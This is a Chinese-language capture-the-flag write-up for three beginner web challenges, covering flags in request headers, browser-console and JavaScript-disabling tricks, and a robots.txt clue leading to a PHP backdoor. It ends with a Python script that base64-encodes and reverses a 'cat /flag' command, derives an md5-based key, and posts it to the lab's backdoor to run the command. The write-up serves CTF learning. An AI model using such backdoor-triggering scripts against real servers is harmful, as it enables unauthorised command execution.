文章目录
- week1
- headach3
- 会赢吗
- 智械危机
week1
headach3
根据提示,在页面的请求头里找到flag
flag{You_Ar3_R3Ally_A_9ooD_d0ctor}
会赢吗
打开控制台,拿到第一部分flag
将地址栏改为提示,去到下一关
控制台调用函数,得到flag
进入第三关,看到与第二关很相似,同样是向一个地方发数据,根据响应拿到flag,但是第二关没有完成该功能的函数,猜测是要自己写一个脚本数据过去
看题解才发现原来是要修改if指向的条件值
去到第四关,修改设置禁用js,拿到flag,最后将所有flag进行base64解码即可
智械危机
进来看到提示flag跟robots相关,访问robots.txt,(这里为什么要访问这个地址,也是在一次ai的过程里突然理解)得到一个地址,进入
函数部分的逻辑好理解,接下来解释一下if部分的逻辑
所以我们所看到的当前网页其实就是else语句执行后的结果
在题目的源码里,我们可以看到解码后的命令会被执行,因此,可以发送一个获取flag的命令过去,也就是一个webshell
from hashlib import *
from random import *
from requests import *
from tqdm import *
import uuid
import base64
url='http://127.0.0.1:59206//backd0or.php'
cmd='cat /flag'
base_cmd=base64.b64encode(cmd.encode()).decode()
rev_base_cmd=base_cmd[::-1]
key=base64.b64encode(md5(rev_base_cmd.encode()).hexdigest().encode()).decode()
payload={
'cmd':base_cmd,
'key':key
}
responce=post(url,data=payload)
print(responce.text)